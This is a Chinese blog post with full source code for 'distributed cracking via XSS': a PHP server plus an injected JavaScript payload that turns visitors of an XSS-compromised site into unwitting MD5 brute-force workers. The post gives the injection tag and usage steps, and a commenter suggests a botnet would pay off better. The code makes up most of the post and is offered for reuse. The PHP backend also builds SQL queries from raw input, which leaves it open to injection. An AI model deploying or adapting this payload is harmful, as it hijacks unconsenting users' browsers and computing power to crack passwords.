XSS之分布式破解

XSS可以做什么?

窃取信息,worm攻击,钓鱼欺骗,DDOS。。。

那XSS之分布式破解又是怎么回事呢??

XSS是基于用户PC而非服务器的,那么被X的量肯定是很大滴,比如一个百度贴吧的xss分分钟就可以让你的收信箱爆掉,那为何我们不好好利用这些PC来为我们做服务呢?
因为浏览器的限制,能提供的服务可能显得很少,但是做计算还是可以的。

比如我在我的服务器上写个js脚本,每个被xss的用户来调用它都会为每个用户分配一个密文和一段不同的爆破区间(比如1-100000,100001-200000。。。),来让用户浏览器进行计算匹配
如果某个浏览器计算并匹配成功就返回破解的明文,否则就再次加载这个js,继续爆破,如果xss量大的话,可以秒破哦!!!

好了思路就是这样子,贴MD5破解的测试代码:

<?php $link = mysql_connect('localhost', 'root', 'passss');
if (!$link) {
        die('Could not connect: ' . mysql_error());
}
mysql_select_db('xss_crack', $link) or die ('Can\'t use foo : ' . mysql_error());
?>

<?php if (isset($_GET['edit'])) : ?>
        <form action="" method="POST">
                密文:<input type="text" name="encode" value="" />
                起点:<input type="text" name="current" value="0" />
                区间:<input type="text" name="region" value="10000">
                <input type="submit" value="Add" />
        </form>
<?php elseif(isset($_GET['look'])) : 
        $sql = "select encode,decode from crack order by addtime";        
        $res = @mysql_query($sql);

        echo '<pre>';
        if (mysql_num_rows($res) > 0) {
                while ($row = mysql_fetch_object($res)) {
                        echo $row -> encode."  --  ";
                        echo $row -> decode;
                        echo "\r\n";
                }
                mysql_free_result($res);
        }
        echo '</pre>';
endif; ?>

<?php
if (empty($_GET)) {
        $id = '';
        $encode = '';
        $current = '';
        $region = '';

        $sql = "select * from crack where cracked=0 order by addtime limit 1;";
        $res = @mysql_query($sql);

        if (mysql_num_rows($res) > 0) {
                while ($row = mysql_fetch_object($res)) {
                        $id = $row -> id;
                        $encode = $row -> encode;
                        $current = $row -> current;
                        $region = $row -> region;
                }
                mysql_free_result($res);
                $sql = "update crack set current=current+region where id=$id";
                $res = @mysql_query($sql);
        }
}
?>

<?php if (empty($_POST) && !empty($id)) :?>
        /*
         * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
         * Digest Algorithm, as defined in RFC 1321.
         * Copyright (C) Paul Johnston 1999 - 2000.
         * Updated by Greg Holt 2000 - 2001.
         * See http://pajhome.org.uk/site/legal.html for details.
         */
        var hex_chr = "0123456789abcdef";
        function rhex(num) {
                str = "";
                for ( j = 0; j <= 3; j++)
                        str += hex_chr.charAt((num >> (j * 8 + 4)) & 0x0F) + hex_chr.charAt((num >> (j * 8)) & 0x0F);
                return str;
        }

        function str2blks_MD5(str) {
                nblk = ((str.length + 8) >> 6) + 1;
                blks = new Array(nblk * 16);
                for ( i = 0; i < nblk * 16; i++)
                        blks[i] = 0;
                for ( i = 0; i < str.length; i++)
                        blks[i >> 2] |= str.charCodeAt(i) << ((i % 4) * 8);
                blks[i >> 2] |= 0x80 << ((i % 4) * 8);
                blks[nblk * 16 - 2] = str.length * 8;
                return blks;
        }

        function add(x, y) {
                var lsw = (x & 0xFFFF) + (y & 0xFFFF);
                var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
                return (msw << 16) | (lsw & 0xFFFF);
        }

        function rol(num, cnt) {
                return (num << cnt) | (num >>> (32 - cnt));
        }

        function cmn(q, a, b, x, s, t) {
                return add(rol(add(add(a, q), add(x, t)), s), b);
        }

        function ff(a, b, c, d, x, s, t) {
                return cmn((b & c) | ((~b) & d), a, b, x, s, t);
        }

        function gg(a, b, c, d, x, s, t) {
                return cmn((b & d) | (c & (~d)), a, b, x, s, t);
        }

        function hh(a, b, c, d, x, s, t) {
                return cmn(b ^ c ^ d, a, b, x, s, t);
        }

        function ii(a, b, c, d, x, s, t) {
                return cmn(c ^ (b | (~d)), a, b, x, s, t);
        }

        function MD5(str) {
                x = str2blks_MD5(str);
                var a = 1732584193;
                var b = -271733879;
                var c = -1732584194;
                var d = 271733878;
                for ( i = 0; i < x.length; i += 16) {
                        var olda = a;
                        var oldb = b;
                        var oldc = c;
                        var oldd = d;
                        a = ff(a, b, c, d, x[i + 0], 7, -680876936);
                        d = ff(d, a, b, c, x[i + 1], 12, -389564586);
                        c = ff(c, d, a, b, x[i + 2], 17, 606105819);
                        b = ff(b, c, d, a, x[i + 3], 22, -1044525330);
                        a = ff(a, b, c, d, x[i + 4], 7, -176418897);
                        d = ff(d, a, b, c, x[i + 5], 12, 1200080426);
                        c = ff(c, d, a, b, x[i + 6], 17, -1473231341);
                        b = ff(b, c, d, a, x[i + 7], 22, -45705983);
                        a = ff(a, b, c, d, x[i + 8], 7, 1770035416);
                        d = ff(d, a, b, c, x[i + 9], 12, -1958414417);
                        c = ff(c, d, a, b, x[i + 10], 17, -42063);
                        b = ff(b, c, d, a, x[i + 11], 22, -1990404162);
                        a = ff(a, b, c, d, x[i + 12], 7, 1804603682);
                        d = ff(d, a, b, c, x[i + 13], 12, -40341101);
                        c = ff(c, d, a, b, x[i + 14], 17, -1502002290);
                        b = ff(b, c, d, a, x[i + 15], 22, 1236535329);
                        a = gg(a, b, c, d, x[i + 1], 5, -165796510);
                        d = gg(d, a, b, c, x[i + 6], 9, -1069501632);
                        c = gg(c, d, a, b, x[i + 11], 14, 643717713);
                        b = gg(b, c, d, a, x[i + 0], 20, -373897302);
                        a = gg(a, b, c, d, x[i + 5], 5, -701558691);
                        d = gg(d, a, b, c, x[i + 10], 9, 38016083);
                        c = gg(c, d, a, b, x[i + 15], 14, -660478335);
                        b = gg(b, c, d, a, x[i + 4], 20, -405537848);
                        a = gg(a, b, c, d, x[i + 9], 5, 568446438);
                        d = gg(d, a, b, c, x[i + 14], 9, -1019803690);
                        c = gg(c, d, a, b, x[i + 3], 14, -187363961);
                        b = gg(b, c, d, a, x[i + 8], 20, 1163531501);
                        a = gg(a, b, c, d, x[i + 13], 5, -1444681467);
                        d = gg(d, a, b, c, x[i + 2], 9, -51403784);
                        c = gg(c, d, a, b, x[i + 7], 14, 1735328473);
                        b = gg(b, c, d, a, x[i + 12], 20, -1926607734);
                        a = hh(a, b, c, d, x[i + 5], 4, -378558);
                        d = hh(d, a, b, c, x[i + 8], 11, -2022574463);
                        c = hh(c, d, a, b, x[i + 11], 16, 1839030562);
                        b = hh(b, c, d, a, x[i + 14], 23, -35309556);
                        a = hh(a, b, c, d, x[i + 1], 4, -1530992060);
                        d = hh(d, a, b, c, x[i + 4], 11, 1272893353);
                        c = hh(c, d, a, b, x[i + 7], 16, -155497632);
                        b = hh(b, c, d, a, x[i + 10], 23, -1094730640);
                        a = hh(a, b, c, d, x[i + 13], 4, 681279174);
                        d = hh(d, a, b, c, x[i + 0], 11, -358537222);
                        c = hh(c, d, a, b, x[i + 3], 16, -722521979);
                        b = hh(b, c, d, a, x[i + 6], 23, 76029189);
                        a = hh(a, b, c, d, x[i + 9], 4, -640364487);
                        d = hh(d, a, b, c, x[i + 12], 11, -421815835);
                        c = hh(c, d, a, b, x[i + 15], 16, 530742520);
                        b = hh(b, c, d, a, x[i + 2], 23, -995338651);
                        a = ii(a, b, c, d, x[i + 0], 6, -198630844);
                        d = ii(d, a, b, c, x[i + 7], 10, 1126891415);
                        c = ii(c, d, a, b, x[i + 14], 15, -1416354905);
                        b = ii(b, c, d, a, x[i + 5], 21, -57434055);
                        a = ii(a, b, c, d, x[i + 12], 6, 1700485571);
                        d = ii(d, a, b, c, x[i + 3], 10, -1894986606);
                        c = ii(c, d, a, b, x[i + 10], 15, -1051523);
                        b = ii(b, c, d, a, x[i + 1], 21, -2054922799);
                        a = ii(a, b, c, d, x[i + 8], 6, 1873313359);
                        d = ii(d, a, b, c, x[i + 15], 10, -30611744);
                        c = ii(c, d, a, b, x[i + 6], 15, -1560198380);
                        b = ii(b, c, d, a, x[i + 13], 21, 1309151649);
                        a = ii(a, b, c, d, x[i + 4], 6, -145523070);
                        d = ii(d, a, b, c, x[i + 11], 10, -1120210379);
                        c = ii(c, d, a, b, x[i + 2], 15, 718787259);
                        b = ii(b, c, d, a, x[i + 9], 21, -343485551);
                        a = add(a, olda);
                        b = add(b, oldb);
                        c = add(c, oldc);
                        d = add(d, oldd);
                }
                return rhex(a) + rhex(b) + rhex(c) + rhex(d);
        }

        function CreateHTTPObject() {
                var xmlhttp;

                try {
                        xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
                } catch (e) {
                        try {
                                xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
                        } catch (e) {
                                xmlhttp = false;
                        }
                }

                if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
                        try {
                                xmlhttp = new XMLHttpRequest();
                        } catch (e) {
                                xmlhttp = false;
                        }
                }

                if (!xmlhttp && window.createRequest) {
                        try {
                                xmlhttp = window.createRequest();
                        } catch (e) {
                                xmlhttp = false;
                        }
                }

                return xmlhttp;
        }

        function post(url, data) {
                var xmlhttp = CreateHTTPObject();
                if (xmlhttp) {
                        xmlhttp.open("POST", url, true);
                        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                        xmlhttp.send(data);
                }
        }

        function badunload(url, id, current, region) {

                post(url, data);
        }

        function sleep(n)
        {
                var start=new Date().getTime(); 
                while(true) {
                        if(new Date().getTime() - start > n)
                                break;
                }
        }

        var id = <?php echo $id; ?>;
        var encode = '<?php echo $encode; ?>';
        var current = <?php echo $current; ?>;
        var region = <?php echo $region; ?>;
        var url = '<?php echo 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF']; ?>';
        var data = '';

        var cracked = false;
        var decode = '';
        region += current;
        while(current < region) {
                if (MD5(String(current)) == encode) {
                        cracked = true;
                        decode = current;
                        break;
                }
                current++;
        }

        if (cracked) {
                data = 'id='+id+'&cracked=1'+'&decode='+encodeURIComponent(decode);
                post(url, data);
        } else {
                data = 'id='+id+'&cracked=0';
                post(url, data);
                var evil = document.createElement('script');
                evil.src = url;
                document.head.appendChild(evil);
        }
<?php endif; ?>

<?php
        if (isset($_POST['cracked'])) {
                if ($_POST['cracked'] == 1) {
                        $decode = $_POST['decode'];
                        $id = $_POST['id'];
                        $sql = "update crack set cracked=1,decode='$decode' where id=$id;";
                        @mysql_query($sql);
                }
        }
        else {
                if (isset($_POST['encode'])) {
                        $encode = $_POST['encode'];
                        $current = $_POST['current'];
                        $region = $_POST['region'];
                        $addtime = date('Y-m-d H:i:s');
                        $sql = "insert into crack(encode,current,region,addtime) value('$encode', '$current', '$region', '$addtime')";
                        @mysql_query($sql);
                }
        }
?>

我用chrome开了三个标签页,破解八位数的,大概3分钟的样子。文章这只是一个思路而已,欢迎各位继续拓展(*^_^*)

使用说明:

http://127.0.0.1/mian.php?edit 是添加待爆破密文的页面
http://127.0.0.1/mian.php?look 是查看爆破成功的页面
xss点引入脚本

<script src='http://127.0.0.1/main.php'></script>

由于我编程技术不行,现在只是实现纯数字的爆破。。。。
而且如果某个用户中途关闭了页面,而分配给他的区间又恰好是密码所在区间那么就算你倒霉破解不出来了。。。

附源码:http://www.03sec.com/wp-content/uploads/2014/06/xss_crack.rar仅供技术交流探讨使用

secmap:这想法我之前就实现过,最后测评了下,发现最大的瓶颈在于浏览器计算能力非常低,浏览器的计算力相当于正常cpu的30%吧.而且是不连续的,这就牵扯到算力的有效计算时间.
粗略的算下 有1w的pv 每个人访问停留15s 那就相当与40个小时的cpu时间 ,因为浏览器不比cpu 所以也就相当于单核cpu跑了12小时的md5?.. 就算是任务下发的形式.也会出现有些任务接到了,破了,但是?成果?没能提交到服务器上.这样的话还不到12小时?现在的gpu估计随随便便就是cpu算力的百倍以上了吧?

ps:有那流量,还不如挂僵尸网络有前途.

 

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码